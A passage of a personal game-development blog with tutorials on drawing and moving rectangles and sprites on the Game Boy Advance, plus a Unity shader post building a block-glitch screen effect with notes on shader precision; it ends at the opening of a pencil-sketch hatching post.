It certainly has some logical consistency to it, but I still find it really cumbersome to figure out what I need. In any case, given that we defined a square sprite in attribute 0, if we wanted to define a 16x16 sprite (and we do), at an x coordinate of 100, it would look like this:

volatile ObjectAttributes *spriteAttribs = &MEM_OAM[0];

spriteAttribs->attr0 = 0x2032; // 8bpp tiles, SQUARE shape
spriteAttribs->attr1 = 0x4064;

The last attribute we need to define is maybe the most important, since it tells the hardware where to look for the tiles in VRAM:

Attr 2	0x FEDC BA98 7654 3210
FEDC	Not Used Today
BA	Not Used Today
98 7654 3210	First Tile Index

It’s worth noting that some of these tables are different when you’re working in 4bpp mode. Eventually I’ll end up using all the options available for sprite drawing, but today I just want to move a thing across my screen.

Combining everything we just talked about: defining our 16x16, 8bpp sprite, at location 100,50, and starting with the tile at index [4][1] looks like this:

volatile ObjectAttributes *spriteAttribs = &MEM_OAM[0];

spriteAttribs->attr0 = 0x2032; // 8bpp tiles, SQUARE shape
spriteAttribs->attr1 = 0x4064; // 16x16 size when using the SQUARE shape
spriteAttribs->attr2 = 2;      // Start at [4][1]

You’ll notice that the index we pass to attr2 isn’t 1, which is what you’d expect to see passed there since we’re at element 1 of the array. However, the index stored in attr2 assumes that you’re using 4bpp sprites. If you’re using 8bpp like us, you need to go up by 2 indices every time you want to access the next tile.

With that set up, we actually have (almost) everything we need to draw our sprite, we just need to set a few more flags on our DisplayControl variable:

#define REG_DISPLAYCONTROL     *((volatile uint16*)(0x04000000))

#define VIDEOMODE_0    0x0000
#define ENABLE_OBJECTS 0x1000
#define MAPPINGMODE_1D 0x0040

int main()
{
    ...
    REG_DISPLAYCONTROL =  VIDEOMODE_0 | ENABLE_OBJECTS | MAPPINGMODE_1D;
    ...
}

As the names suggest, these flags tell the hardware to enable support for objects, and to expect tile memory to be stored as a 1D array. I’ve already covered all the info needed to understand what these mean, so hopefully they make sense now. If you’re confused about the 1D array flag, know that the only other option for tile mapping is in a 2D array, but in the interest of brevity (and imo, coding sanity), I’ve omitted that from this article. As usual, Tonc covers it very well if you’re interested in knowing more.

Putting It All Together

All that’s left is to put together what we already have. Aside from the sprite include files I added earlier, all the code we need to move a sprite across the screen can easily fit below:

#include "sprite.h"
#include <string.h>

typedef unsigned char      uint8;
typedef unsigned short     uint16;
typedef unsigned int       uint32;

typedef uint32 Tile[16];
typedef Tile   TileBlock[256];

#define VIDEOMODE_0    0x0000
#define ENABLE_OBJECTS 0x1000
#define MAPPINGMODE_1D 0x0040

#define REG_VCOUNT              (*(volatile uint16*) 0x04000006)
#define REG_DISPLAYCONTROL      (*(volatile uint16*) 0x04000000)

#define MEM_VRAM      ((volatile uint16*)0x6000000)
#define MEM_TILE      ((TileBlock*)0x6000000 )
#define MEM_PALETTE   ((uint16*)(0x05000200))
#define SCREEN_W      240
#define SCREEN_H      160

typedef struct ObjectAttributes {
    uint16 attr0;
    uint16 attr1;
    uint16 attr2;
    uint16 pad;
} __attribute__((packed, aligned(4))) ObjectAttributes;

#define MEM_OAM       ((volatile ObjectAttributes *)0x07000000)

inline void vsync()
{
    while (REG_VCOUNT >= 160);
    while (REG_VCOUNT < 160);
}

int main()
{
    memcpy(MEM_PALETTE, spritePal,  spritePalLen );
    memcpy(&MEM_TILE[4][1], spriteTiles, spriteTilesLen);

    volatile ObjectAttributes *spriteAttribs = &MEM_OAM[0];

    spriteAttribs->attr0 = 0x2032; // 8bpp tiles, SQUARE shape, at y coord 50
    spriteAttribs->attr1 = 0x4064; // 16x16 size when using the SQUARE shape
    spriteAttribs->attr2 = 2;      // Start at the first tile in tile

    REG_DISPLAYCONTROL =  VIDEOMODE_0 | ENABLE_OBJECTS | MAPPINGMODE_1D;

    int x = 0;
    while(1)
    {
        vsync();
        x = (x+1) % (SCREEN_W);
        spriteAttribs->attr1 = 0x4000 | (0x1FF & x);

    }
    return 0;
}

Voila! You are now in posession of your very own moving sprite. Notice that unlike last week, we don’t have to do any work to clear the screen (thanks objects!), and all it takes to move the sprite is to update the appropriate attribute.

Finally, I promised to link you to the tools that I used to generate the sprites, both of which were written by the author of the Tonc tutorial. For bitmap editing (and bitmap palette editing), I used Usenti, and for exporting that bitmap to the .c code we looked at, I used Grit. Both tools are very straightforward, but definitely don’t overlook Grit’s GUI client (helpfully called “WinGrit”), it makes life much easier.

That’s it for today! Hope you had as much fun as I did! As always, if you want to say hi, I’m most accessible on Twitter, Have a good one!

GBA By Example - Drawing and Moving Rectangles

2017-03-28T00:00:00+00:00

The idea of making something for GameBoy has always appealed to me. Not only was it my platform of choice when I was a little kid, but naively, it has always looked like the relaxing combination of hardware simple enough to really understand, an OS (or BIOS) that gets out of your way (no firmware updates), and a platform that’s open enough to not need to deal with jailbreaking the device, and the GBA could do 3D!

I’ve had a Kirkzz Everdrive sitting around for a few months that I’ve meant to play with, and I finally had some time during my vacation lask week to try it out. Behold the fruits of my labors:

(I on the other hand, cannot make the GBA do 3D yet)

So, it isn’t exactly impressive, but it was a lot of fun, and I definitely want to play around with the GBA some more.

One of the great things about being late to the dev scene for a console is that lots of people have come before you and written great material, especially GBATek and the Tonc Tutorials. But what I really wish existed was a GBA version of the excellent Metal By Example, which does an amazing job at easing into the nuts and bolts of the Metal API, by presenting each step as a small, buildable example.

Since that doesn’t exist for the GBA yet, I’m here to make that happen. To that end: this article is going to focus on the absolute minimum you need to know to draw and move rectangles around the screen on the GBA. You can do a lot with just that, and it feels great to see something moving on screen, so let’s get started!

Setting Up Your Dev Environment

First thing first, we’re going to need a way to run our project. As mentioned, I have an Everdrive GBA cart so I could put my stuff on actual hardware, but that’s completely overkill for this tutorial (and to be honest, most of the time it was faster to work in emulator anyway). I downloaded VisualBoyAdvance to work with, which is a great open source emulator, but there are lots out there to choose from, and any of them should be able to do what we need them to do.

Secondly, we’re going to need a way to build our projects. There are fewer options here, and the one that I found the best was DevKitPro. This has tools for lots of platforms, but make sure you enable the GBA and ARM components when you’re installing. Once you have that installed, it’s time to set up your project. The easiest thing for my was to copy one of the makefiles from the devkitpro examples folder and simply change the name of the “sources” folder to the one that I was using for my build:

I placed that make file in the same directory as the folder which held my code (which was the root dir of my project). With that, all it took was a simple call to make to get a fully working GBA game!

If you’re dubious about this working, this gist has a minimal gba example which will clear the screen red. Try putting that in your source directory and running make, and then opening the result in your emulator of choice. If you see a red screen, everything is working as intended.

Setting a Video Mode

Ok, so now we know our build process works, it’s time to dig into the nuts and bolts of building something for gameboy!

The first thing we need to do is pick a video mode to use. The GBA has five different modes that control how you draw to the screen. Eventually, I’m sure it will be good to know how to use each one of these modes, but mode 3 seemed like the easiest to use, so that’s where I started. What this means is that our screen buffer is going to be a 240 x 160, 16 bit buffer. It’s also going to be single-buffered, so if we want to change the pixel at (50,50) on the screen, all we need to do is go to that point in video memory and change the value there.

Now here’s where things started feeling weird to me: in order to set the gameboy to video mode 3, we need to set a display control byte to the correct value. I expected that this meant there’d be a function to call, but there isn’t. What we need to do is go to memory address 0x04000000, and set the correct video mode flag there. It turns out that GBA dev is full of this paradigm - the hardware is simple enough that a lot of things can be controlled by a specific bit or byte being said, and rather than expose this via a system call, you just set the value directly at the appropriate address. Ahh, the wonders of old school tech.

Predictably, to set the hardware to video mode 3, we need to set the display control register (0x04000000) to a value of 3 (more specifically 0x0003). We also need to set a background mode. This is important for other video modes, but since we’re using mode 3, all we need to know is that our background mode needs to be set to mode 2 in order for anything to show up.

We can set these values like this:

typedef unsigned int    uint32;

#define REG_DISPLAYCONTROL *((volatile uint32*)(0x04000000))
#define VIDEOMODE_3         0x0003
#define BGMODE_2            0x0400

int main()
{
    REG_DISPLAYCONTROL = VIDEOMODE_3 | BGMODE_2;
    while(1){}
}

A lot of tutorials use more concise constant names, and while they may be more standard (like REG_DISPCNT), I found it much easier to use more descriptive names. Additionally, you may be wondering why our pointer to the REG_DISPLAYCONTROL address needs to be marked “volatile,” this is an instruction to the compiler to tell it that even though nothing in our code is reading from this address, we don’t want the compiler to optimize away the logic that sets it’s value (since the hardware is going to look at this address).

You probably also noticed that I defined my own convenience type for unsigned ints. Since we’re going to do a lot of writing values directly to memory addresses, the size of our integers matters a lot, and typing “unsigned int” out all the time will drive you mad.

Lastly, you definitely noticed that the program immediately enters an infinite while loop. We really, really, don’t want to have our main function exit, since that would mean the gameboy game would exit, and what that means is undefined. So instead of a traditional game loop with a flag to control when to exit, game loops on GBA will always be infinite.

If you run this, it will (unsurprisingly) do nothing, so maybe we should tell it to do something?

Drawing To The Screen

Like I mentioned before, in mode 3, we don’t need to worry about managing multiple color buffers, or working with tile maps, or anything else. All we need to do is set the pixels in video memory to what we want. This is virtually identical to what we had to do previously to set the video mode, except that the screen buffer starts at memory address 0x06000000:

typedef unsigned char      uint8;
typedef unsigned short     uint16;
typedef unsigned int       uint32;

#define REG_DISPLAYCONTROL *((volatile uint32*)(0x04000000))
#define VIDEOMODE_3         0x0003
#define BGMODE_2            0x0400

#define SCREENBUFFER        ((volatile uint16*)0x06000000)
#define SCREEN_W            240
#define SCREEN_H            160

int main()
{
    REG_DISPLAYCONTROL = VIDEOMODE_3 | BGMODE_2;

    for (int i = 0; i < SCREEN_W * SCREEN_H; ++i)
    {
    	SCREENBUFFER[i] = 0xFFFF;
    }

    while(1){}
    return 0;
}

Running this now will get you a nice white screen. Progress! Note that we don’t dereference the pointer to the screen buffer in the macro, because we want to index into the screen buffer array to set pixels that aren’t the top left corner of the screen (on GBA, the Y axis increases as it gets lower on screen), and to do that, we need a pointer to the beginning of the array.

The only sorta weird thing about this is how the GBA stores colours. Earlier I said that Mode 3 meant our screen was 16 bit color, but that’s not really true. The GBA actually uses 15 bit color, leaving the first bit alone. In the above example, we didn’t need to know this, because we were just setting things to pure white, but assuming you’ll want to write a colour that isn’t black or white, the following function comes in handy:

inline uint16 MakeCol(uint8 red, uint8 green, uint8 blue)
{
    return red | green << 5 | blue << 10;
}

To give credit where it’s due, the above function comes from the Tonc tutorial As you may have guessed from the above, colours on the GBA are stored as 16 bit integers, with the data laid out like this:

[unused bit] BBB BBGG GGGR RRRR

Note that each colour getting only 5 bits means that channels can only store 1 of 32 values (0 - 31), so passing a number outside this range to the function is essentially useless. I’ve seen some other tutorials recommend AND-ing the passed in channel values with 0x1F to clamp them to a 5 bit value, but I feel like ensuring the inputs to your functions are correct is a problem for an assert in a debug build and not runtime cycles. That being said, how to debug a GBA game is beyond the scope of what I want to talk about today (and to be honest, outside the scope of what I know how to do right now), so maybe AND-ing isn’t such a bad idea:

inline uint16 MakeCol(uint8 red, uint8 green, uint8 blue)
{
    return (red & 0x1F) | (green & 0x1F) << 5 | (blue & 0x1F) << 10;
}

You can use the above function to make any colour your screen is capable of displaying, but right now all we have is the logic to clear the screen to a colour. Let’s do something a bit more interesting and write the (hopefully) extremely simple function for drawing differently sized rectangles:

void drawRect(int left, int top, int width, int height, uint16 clr)
{
    for (int y = 0; y < height; ++y)
    {
        for (int x = 0; x < width; ++x)
        {
    	   SCREENBUFFER[(top + y) * SCREEN_W + left + x] = clr;
        }
    }
}

That’s much more useful! Now we can make vertical and horizontal lines, and rectangles of all shapes and sizes. You can even divide up the screen into 8x8 blocks and set each one to something different if you feel like it!

(I did)

But this is only useful if you want to make static images appear on your screen, and the title of this post also promised that our rectangles would move, so it’s time to move inside our infinite game loop and do some work there.

The GBA Drawing Process

Before we get to the fun stuff though, I need to talk briefly about how the GBA takes the data in the SCREENBUFFER array draws it on the screen.

The GBA draws each row of the screen sequentially, and serially (one after the other). Updating a pixel on the screen takes the hardware 4 cycles, which means that updating a single row of the screen takes 4 * 160 cycles. At the end of each row, the hardware pauses briefly. This pause is known as the Horizontal Blank, or HBLANK, and takes as long as it would take the hardware to update another 68 pixels (272 cycles).

This process continues for each row on the screen. Once all the rows have been updated, there is a larger pause called the Vertical Blank, or VBLANK. This pause lasts as long as it would take the hardware to update 68 more rows of pixels (including the HBLANK time). This works out to 4 * (240 + 68) * 68, or 83776 cycles. These numbers will be very important in more complex project, but are included here just because I thought it was good info to know.

This drawing process is going to occur no matter what our code is doing, without us having to tell the hardware to do it, which means that any code which modifies the data in the SCREENBUFFER array, should do so in the VBLANK pause. Otherwise, we could update the screen halfway through it being drawn, which would lead to tearing artifacts where part of the screen is displaying 1 frame behind other parts.

This means that we need to be able to detect when we’re in VBLANK! There’s two ways to do this, the proper way and the easy way. For my first attempt at GBA dev, I chose the easy way:

#define REG_VCOUNT      (* (volatile uint16*) 0x04000006)
inline void vsync()
{
  while (REG_VCOUNT >= 160);
  while (REG_VCOUNT < 160);
}

The value at REG_VCOUNT holds the index of the current row being drawn to by the hardware. The above function simply waits until we are at an index that is beyond the height of the screen (160). If called inside VBLANK, it will block until the next VBLANK is hit. Is this awful and complete overkill? YES! It also works pretty nicely for something as simple as a moving rectangle game.

It’s worth noting that you are free to do any calculations you want during VDRAW (what it’s called when the hardware is not in VBLANK), as long as you don’t update the values in the screen buffer.

Using the above vsync() function, we can finally add some animation, since the function above not only blocks until VBLANK, but will also block until next frame:

int main()
{
    REG_DISPLAYCONTROL = VIDEOMODE_3 | BGMODE_2;

    for (int i = 0; i < SCREEN_W * SCREEN_H; ++i)
    {
    	SCREENBUFFER[i] = MakeCol(0,0,0);
    }

    int x = 0;
    while(1)
    {
    	vsync();
    	drawRect(x % SCREEN_W, (x / SCREEN_W) * 10, 10, 10,MakeCol(0,31,0));
    	x += 10;
    }

    return 0;
}

If you run this, you’ll slowly see your screen get filled, 10 pixels at a time, by a lovely white color:

You’ll notice that the screen doesn’t do any clearing for us at all. This is actually good news, since writing to the SCREENBUFFER array takes up cycles, and we don’t want our hardware using up any of our precious CPU time that it doesn’t have to. This means that if you wanted to say, move a rectangle across the screen instead of having the screen fill up, you also need to write black to the previous location of the rectangle:

while(1)
{
    vsync();

    if ( x > SCREEN_W * (SCREEN_H/10)) x = 0;
    if (x)
    {
        int last = x - 10;
        drawRect(last % SCREEN_W, (last / SCREEN_W) * 10, 10, 10,MakeCol(0,0,0));
    }

    drawRect(x % SCREEN_W, (x / SCREEN_W) * 10, 10, 10,MakeCol(31,31,31));
    x += 10;

}

You’ll notice I also added a bit of logic to wrap the x value when it goes off the end of the screen. This gives you a lovely white rectangle which traverses each row on your screen. If it looks like the rectangle is skipping frames, make sure the “frameskip” option in your emulator isn’t turned on.

Note that the gif above IS skipping frames, because capturing my gif capturing program only suports up to 30 fps, so if your game is as choppy as the gif, your frameskip option is turned on.

Other than that, you should be good to go!

Wrap Up

Usually I’d talk about performance, but I haven’t figured out how to get a timer running on the GBA yet, so I really can’t, other than to say the snake game runs smoothly. I have no idea when I’ll post more about game boy stuff, since I have other projects that I want to get done, but hopefully this was helpful enough to get you started, and pointed at some much more detailed resources!

If you’re interested in the Snake game that I made for GBA, all the source is available on github here.

As always, if you have any questions, comments, or cat gifs, send them my way on Twitter!

Fixeds, Floats and a Block Damage Effect

2017-03-13T00:00:00+00:00

As you may have guessed from the everything that I post, I love cheesy rendering effects, and no surprise, that means that I’m a big fan of cyberpunk games, especially ones that really go over the top with effects. As such, I thought I’d spend some time this weekend building a classic glitch effect:

It’s a very simple effect, but it’s also a perfect excuse to talk about using the correct precision for variables when writing shaders. In the last article I wrote, I touched a bit on using texture formats that have enough precision for the data you’re storing in them; today I’m going to go over how to decide whether to use a fixed, half or float on a line to line basis when writing a shader.

That will come later though, first, let’s go over how the glitch effect we’re building works:

How It works

The first thing we’ll need to do is find some way to divide our screen up into rectangular regions, identified by a scalar value. You can do this with UV math right in the shader, but it’s much easier to play with if this is texture driven, so we’ll need to create a texture like the following:

Since this texture identifies each block with a value between 0 and 1 (the intensity of the colour), we’ll pass a second value to our shader also between 0 and 1. As the shader executes, any fragment which is in a block that has a value greater than our control value will sample the screen buffer using UVs which have had a constant value added or subtracted to them. This will keep all texture samples within a block cohesive with each other, producing the effect we want:

if we use the grayscale image above however, our UV offset will always be diagonal and in the same direction, which isn’t exactly what we want. So I’m going to use the R channel as our identifier channel, and put different random values into the GB channels of the noise texture, which we’ll use to drive our UV offsets:

(I wrote a quick tool to generate these types of maps, I’m not going to walk through building it, but you can grab it in the github repo here)

Then we’ll modify the effect to randomly choose which blocks to glitch, so that we don’t end up with a predictable pattern of glitchiness (which…kinda looks the opposite of glitchy), and I’ll talk a bit about some things you can do to make the whole effect look a bit more convincing (imo), and different ways you can extend it. I’ll also sprinkle in some notes about optimization.

So let’s get started!

Getting Something On Screen

I always try to get something on screen as fast as possible when I work, both so that I can verify that my code is doing what I think it should be, and to make sure that what I’m building actually looks good. So let’s start this effect the same way, by just getting the glitch effect working and distorting the whole screen.

Like usual, we’re going to be making a post effect, so we need to start with a bit of scaffolding in C#. Unlike past articles, this effect is simple enough that we don’t need to set up any extra cameras, we just need to make sure that blit to the screen using our effect material:

[RequireComponent(typeof(Camera))]
public class GlitchFX: MonoBehaviour
{
public float glitchAmount = 0.0f;
public Texture2D blockTexture;

private Shader _glitchShader;
private Material _glitchMat;

void Start ()
{
    _glitchShader = Shader.Find("Hidden/GlitchFX/GlitchFX_Shift");
    _glitchMat = new Material(_glitchShader);
    _glitchMat.SetTexture("_GlitchMap", blockTexture);
}

private void OnRenderImage(RenderTexture source, RenderTexture destination)
{
    Graphics.Blit(source, destination, _glitchMat);
}

void Update ()
{
    glitchAmount = Mathf.Clamp(glitchAmount, 0.0f, 1.0f);
    _glitchMat.SetFloat("_GlitchAmount", glitchAmount);
}

We’ll revisit this script later on when we want to tweak the effect, but for now, this is all we’ll need to get going. Next up, we need to get our shader set up. I’m going to assume that you can set up most of the material file yourself, and skip right to the fragment shader. If you’re lost, the shader is also in the github repo here

fixed4 frag (v2f i) : SV_Target
{
    fixed2 glitch = (tex2D(_GlitchMap, i.uv)).rg;			
    fixed4 col = tex2D(_MainTex, i.uv + glitch.rg);
    return col;
}

Alright, now we’re cooking! If you run this now you should get a full screen of glitchy goodness! If you’re seeing weirdness around the edges of the blocks like this:

Make sure that you’ve set your noise map texture to “point” filtering.

Optimization Notes Part 1

While what we’re doing is very straightforward, it’s worth taking a minute to talk about a quick optimization point. Notice that I’m only grabbing 2 channels from the texture. This is going to be very slightly faster than grabbing the whole texture, or grabbing just 1 channel and creating a fixed2 from that.

You can test this yourself the same way I did, and run the above post process effect 101 times per frame, like so:

private void OnRenderImage(RenderTexture source, RenderTexture destination)
{
    RenderTexture t = RenderTexture.GetTemporary(source.width, source.height);
    for (int i = 0; i < 50; ++i)
    {
        Graphics.Blit(source, t, _glitchMat);
        Graphics.Blit(t, source, _glitchMat);
    }
    Graphics.Blit(source, destination, _glitchMat);
    RenderTexture.ReleaseTemporary(t);
}

On my iPhone 6, the performance impact was too small to see without doing something like the above, and even in the above stress test, we’re talking about a difference of about 2 ms. It’s not like your project will fail if you don’t know this technique, but small optimizations add up, especially when you’re trying to hit 60 fps on mobile.

So that covers the texture sample line, but I also mentioned that we’d pay special attention to the precision of variables in this post, so let’s talk about why the texture sample was stored in a fixed2, and not a float2, for instance. As we’ll see when we have more instructions to look at, it’s a matter of minimizing the number of times we need to cast our data to a different precision. Some functions take floats as args, so passing in a fixed will require it to be cast up into a higher precision type or vice versa.

It’s also worth looking at the glsl that will be generated by Unity’s shader compiler for the above shader:

uniform sampler2D _MainTex;
uniform sampler2D _GlitchMap;
varying highp vec2 xlv_TEXCOORD0;
void main ()
{
  lowp vec4 tmpvar_1;
  tmpvar_1 = texture2D (_GlitchMap, xlv_TEXCOORD0);
  highp vec2 P_2;
  P_2 = (xlv_TEXCOORD0 + tmpvar_1.xy);
  lowp vec4 tmpvar_3;
  tmpvar_3 = texture2D (_MainTex, P_2);
  gl_FragData[0] = tmpvar_3;
}

Notice that by default, sampler2Ds in CG code are turned into low precision samplers in GLSL by Unity. GLSL lowp, mediump and highp float precision qualifiers map to CG’s fixed, half and float datatypes. This means that if we used a float2 instead of a fixed2 to store the texture lookup, we’d need to the value returned by the tex2D call up into float precision. You can see this happen if you change glitch to a float2 and examine the glsl again:

uniform sampler2D _MainTex;
uniform sampler2D _GlitchMap;
varying highp vec2 xlv_TEXCOORD0;
void main ()
{
  highp vec2 glitch_1;
  lowp vec2 tmpvar_2;
  tmpvar_2 = texture2D (_GlitchMap, xlv_TEXCOORD0).xy;
  glitch_1 = tmpvar_2;
  highp vec2 P_3;
  P_3 = (xlv_TEXCOORD0 + glitch_1);
  lowp vec4 tmpvar_4;
  tmpvar_4 = texture2D (_MainTex, P_3);
  gl_FragData[0] = tmpvar_4;
}

This may look like a trivial change (in fact, the PowerVR Shader Editor doesn’t even recognize it as an extra instruction), but the performance impact of minimizing precision casts is very real. Again, I highly recommend you write some tests to try it out for yourself, using the same method as before (running it 100 times per frame). If you do, you’ll notice that the cost of an individual cast isn’t that high, but across a whole project, these costs can add up.

Also, since we’re not sampling from a half precision or floating point texture, there really isn’t anything to be gained from using anything but a fixed here. If you need to sample from one of those textures, you can add a suffix to your sampler2D uniform to get a half or full precision sampler:

sampler2D_float _GlitchMap;
sampler2D_half _GlitchMap;

Ok, that’s a lot of analysis for now, let’s do something a bit more flashy.

Finishing the Glitch Effect

So far our post process shader is assuming that we want to distort the entire screen RIGHT NOW, but that isn’t how the glitch effect we want works, we want to distort different parts of the screen at different times.

I’m going to start by using the value of the red channel in our map as the noise value for the blocks. This will give us an effect that follows a predictable pattern, but it will be way more convincing than what we have now. Once this is working, we can worry about adding randomness.

So what we need to do is pass a float value to the shader, and compare the value of each block against this value. Blocks which have a value less than or equal to our passed in control value will use the offset UVs (appearing glithed), and blocks with a value greater will appear normal. This means that if we pass a value of 1.0 to our control value, all blocks will glitch because no value can be greater than 1.

If all GPUs were good at branching, this could be written like this:

fixed4 frag(v2f i) : SV_Target
{
    fixed2 glitch = (tex2D(_GlitchMap, i.uv)).rg;

    float2 uvShift = glitch.rg;
    if (glitch.r >= _GlitchAmount)
    {
        uvShift *= 0.0;
    }

    fixed4 col = tex2D(_MainTex, frac(i.uv + uvShift));
    return col;
}

But since we can’t be sure what device this effect will need to run on, I’m going to replace the conditional with a bit of math that accomplishes the same thing:

fixed4 frag(v2f i) : SV_Target
{
    fixed2 glitch = (tex2D(_GlitchMap, i.uv)).rg;

    float2 uvShift = glitch.rg * ceil(_GlitchAmount - glitch.r);

    fixed4 col = tex2D(_MainTex, i.uv + uvShift));
    return col;
}

All we’re doing here is comparing our two values with a subtract and rounding up to the nearest whole number, this only works because we know that both numbers have the same range (0 to 1). However, this has an edge case: if your glitch value is exactly 1.0, this calculation can result in a value of -1, which would distort part of the image even when we want no glitching, which is obviously incorrect. I’m going to add a max to the calculation here to resolve this:

float2 uvShift = glitch.rg * ceil(max(-0.99,_GlitchAmount - glitch.r));

In a real project though, you’ll want to pre-process your glitch map to make sure it doesn’t have any 1.0 blocks so that you can get rid of this extra instruction and save some performance.

You may have noticed if you run this right now, you get some weird colours in your glitched image, for me, this looked like way more brown than there should have been:

This is because when we add our UV offset to our UV coordinates, we’re ending up sampling from outside of the area of the screen buffer. The buffer is set to clamp at the border, meaning what we’re seeing is a lot of fragments picking up pixels from the edge of our image. Since we don’t care about the integer value of our UV coordinates (and in fact want to get rid of them), we can add a frac() function to our shader and get home-grown UV wrapping.

fixed4 col = tex2D(_MainTex, frac(i.uv + uvShift));

Put all this together and you get an effect that looks like this as the _GlitchAmount value pans from 0 to 1:

Optimization Notes Part 2

We have another line of shader code now, so let’s talk about

    float2 uvShift = glitch.rg * ceil(max(-0.99,_GlitchAmount - glitch.r));

First of all, it’s almost always a bad idea to use anything but floats to hold UV coordinates. The other datatypes don’t have enough precision to accurately sample a texture, which is what you want them to do 99% of the time.. We don’t really care about whether or not our shifted coordinates are super accurate though, so the question of what data type to use comes down to raw performance.

Boringly enough this doesn’t actually change anything, because _GlitchAmount is a float, and the tex2D() function expects the uv coordinates that get passed to it to be floats, so no matter what we start with, we very quickly need to cast our variable up to a float anyway, so we may as well keep to the standard rule of “uv math gets done in full precision” here too.

It’s worth noting that although we’re working with fixeds a lot in this post, on newer hardware, most GPUs have full support for halfs and will go so far as to ignore the fixed qualifier and do everything in halfs and floats. Check the specifics for your target devices, but it’s usually safe to say that if your iOS device supports metal, it’s safe to use halfs instead of fixeds. I’m under the impression that this is even more common on Desktops.

Alright, back to making things look cool!

Randomizing the Glitch

Our effect is looking better, but it still isn’t really “glitchy” is it? If we leave our glitch value along, the effect stays static, distorting fixed blocks on the screen. As well, even with the _GlitchAmount value changing, our effect follows a predictable pattern, always glitching blocks in the same order. It’s time to make this a bit more random.

To do this, we’re going to need to be able to get a random value for each block to use instead of the red channel intensity to decided when to glitch a block. Further, we’re going to want this random value to not only be uniform across an entire block, we also want to be able to control when the random values change so that we can control how fast our effect updates.

Luckily, the commonly copy/pasted one liner for generating random numbers in a shader takes two parameters as input:

float rand(float2 co)
{
    return frac(sin(dot(co.xy, float2(12.9898, 78.233))) * 43758.5453);
}

So we’re going to use that, and pass the red channel value as the first component of co, and pass a uniform float that we send from c# to the shader as the second component. It’s beyond the cope of this post to talk about how this one liner works, but if you have a spare second it’s definitely worth googling.

This time we’re using floats because we want more potential variety in our random number. Using a half or a fixed reduces the number of values that can be represented between 0 and 1. It might make a huge difference if you use halfs here instead of floats, but it will make some, and as you’ll see in a second, we would need to cast it up to a float back in our fragment function anyway.

Our shader now looks like this:

sampler2D _MainTex;
sampler2D _GlitchMap;

float _GlitchAmount;
float _GlitchRandom;

float rand(float2 co)
{
    return frac(sin(dot(co.xy, float2(12.9898, 78.233))) * 43758.5453);
}

fixed4 frag(v2f i) : SV_Target
{
    fixed2 glitch = (tex2D(_GlitchMap, i.uv)).rg;

    float r = (rand(float2(glitch.r, _GlitchRandom)));
    float gFlag = max(0.0, ceil(_GlitchAmount - r));

    float2 uvShift = glitch.rg * gFlag;

    fixed4 col = tex2D(_MainTex, frac(i.uv + uvShift));
    return col;
}

And in c#, we have to add a line to our update() function:

void Update ()
{
    glitchAmount = Mathf.Clamp(glitchAmount, 0.0f, 1.0f);
    _glitchMat.SetFloat("_GlitchRandom", Random.Range(-1.0f, 1.0f));

    _glitchMat.SetFloat("_GlitchAmount", glitchAmount);
}

If you set your _GlitchAmount to 0.2 and run this now it looks something like this:

Which is much better, but a little bit too spastic for my liking. I ended up putting my _GlitchRandom setter inside another function that I called using Invoke, so that I could control how often I wanted my effect to update:

void Start ()
{
    _glitchShader = Shader.Find("Hidden/GlitchFX/GlitchFX_Shift");
    _glitchMat = new Material(_glitchShader);
    _glitchMat.SetTexture("_GlitchMap", blockTexture);

    Invoke("UpdateRandom", 0.25f);
}

void UpdateRandom()
{
    _glitchMat.SetFloat("_GlitchRandom", Random.Range(-1.0f, 1.0f));
    Invoke("UpdateRandom", Random.Range(0.01f, 0.15f));
}

It’s a little change, but it makes a big difference!

Adding New Sample Directions

We have two final problems to solve:

when the effect is set to 1.0, the screen still ends up with a static looking glitch effect
all our texture lookups are going in the same direction, since we’re using a gray value as our offset

Thankfully both are pretty easy to solve. To fix the first one, all I’m going to do is multiply the UV offset by the random value for the block. This way, even when the entire screen is glitching, when _GlitchRandom updates, every block will use different UV coordinates, making it much less uniform.

float2 uvShift = glitch.rg * gFlag * r;

And secondly, we’re finally going to use that coloured noise map I showed you at the very beginning! Until now, we’ve been using the rg components of the noise texture as a cheap way to get a uv offset. Now we’re going to change to using the coloured map, and use the green and blue components for this vector:

fixed4 frag(v2f i) : SV_Target
{
    fixed3 glitch = (tex2D(_GlitchMap, i.uv)).rgb;

    float r = (rand(float2(glitch.r, _GlitchRandom)));
    float gFlag = max(0.0, ceil(_GlitchAmount-r));

    float2 uvShift = glitch.gb * gFlag;

    fixed4 col = tex2D(_MainTex, frac(i.uv + uvShift));
    return col;
}

This is better, but since the .gb channels will always have positive values, our texture lookups still only in 2 directions: positive in both axes. To fix this, we need to stretch the range of these channels so that 0.5 becomes our new 0, and values lower than 0.5 become negative. This just takes a quick multiply and subtract:

float2 uvShift = (glitch.gb * 2.0 - 1.0) * gFlag;

If you run this now, you’re going to get exactly the effect that was shown at the start of the article!

Wrap Up

As usual, all of the code I talked about here is available on github, feel free to grab that and use it however you want!

Let’s end by talking about performance, and some ways you could extend this effect.

From a performance standpoint, this is a remarkably light effect. Even though we’re introducing a dependent texture read on a full resolution screen buffer, my iPhone 6 barely noticed this thing running, taking around 0.2 ms to render it. One thing to keep in mind with this effect is that the cost is the same whether you’re glitching the whole screen, or not glitching anything, so if you have this in a project, it might be worth adding some logic on the c# side to disable the effect when _GlitchAmount is set to 0.

Finally, there are LOTS of ways you can extend this effect! You could hue shift the glitched blocks, tint them colours, you could add chromatic aberration to the glitched blocks, or use a noise texture to add weird artifacts over them. The sky is really the limit here. If you want some inspiration, take a look at the page the DigiEffects Damage AfterEffects Package. Glitch effects are really fun because there’s so much you can do with them since you’re not trying to make things look “correct,” which is probably why so many people like making glitch art.

That’s it for now! As usual, if you have questions, or want to say hi, or see something I got wrong, please send me a message on Twitter! Have a good one!

A Pencil Sketch Effect

2017-02-21T00:00:00+00:00

There are a handful of effects that have kicked around in my brain for awhile in a nebulous “one day, I want to build that” sort of way. Some of these include using genetic algorithms to turn images into triangles (like here), Portals, Procedural Clouds, and the one I decided to build this weekend: Real Time Hatching (or something like it)!

Real Time Hatching is the fancy (and much more concise) way of describing the class of rendering effects that make scenes look like they were drawn (or at least shaded) by hand. The effect is actually reasonably simple, but it’s pretty fun and provides a few good excuses to talk about fixed/half/float precision.

I’m going to present the basic effect as it would look if you wanted to write a shader to attach to a single object, how to turn that into a post effect that will work on the whole screen, and take a few detours in the process. All the code here is going to be for Unity 5.5, so your mileage may vary if you’re using a different version.

Tonal Art Maps

